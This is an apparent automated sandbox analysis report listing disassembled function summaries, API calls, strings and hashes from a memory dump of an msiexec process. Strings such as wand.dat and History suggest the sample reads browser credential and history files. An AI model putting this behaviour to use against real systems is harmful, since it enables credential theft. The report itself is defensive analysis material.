                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memicmpwcslen
                                                                                          • String ID: @@@@$History
                                                                                          • API String ID: 1872909662-685208920
                                                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                          • memset.MSVCRT ref: 00410112
                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                          • String ID: </%s>
                                                                                          • API String ID: 3400436232-259020660
                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                          • String ID: caption
                                                                                          • API String ID: 1523050162-4135340389
                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                          APIs
                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                          • String ID: MS Sans Serif
                                                                                          • API String ID: 210187428-168460110
                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                          • String ID: edit
                                                                                          • API String ID: 2747424523-2167791130
                                                                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                          APIs
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                          • API String ID: 3150196962-1506664499
                                                                                          • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                          • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 3384217055-0
                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 368790112-0
                                                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                          APIs
                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                          • String ID:
                                                                                          • API String ID: 1889144086-0
                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                          APIs
                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                          • String ID:
                                                                                          • API String ID: 1661045500-0
                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                          APIs
                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                          Strings
                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                          • API String ID: 1297977491-2063813899
                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                          • String ID: *.*$dat$wand.dat
                                                                                          • API String ID: 2618321458-1828844352
                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                          APIs
                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                          • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1549203181-0
                                                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00412057
                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                          • String ID:
                                                                                          • API String ID: 3550944819-0
                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                          APIs
                                                                                          • free.MSVCRT ref: 0040F561
                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$free
                                                                                          • String ID: g4@
                                                                                          • API String ID: 2888793982-2133833424
                                                                                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: @
                                                                                          • API String ID: 3510742995-2766056989
                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                          • memset.MSVCRT ref: 0040AF18
                                                                                          • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 1865533344-0
                                                                                          • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                          • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1127616056-0
                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                          • memset.MSVCRT ref: 0042FED3
                                                                                          • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID: sqlite_master
                                                                                          • API String ID: 438689982-3163232059
                                                                                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                          APIs
                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 3917621476-0
                                                                                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                          APIs
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                          • String ID:
                                                                                          • API String ID: 822687973-0
                                                                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
                                                                                          • free.MSVCRT ref: 0041747F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
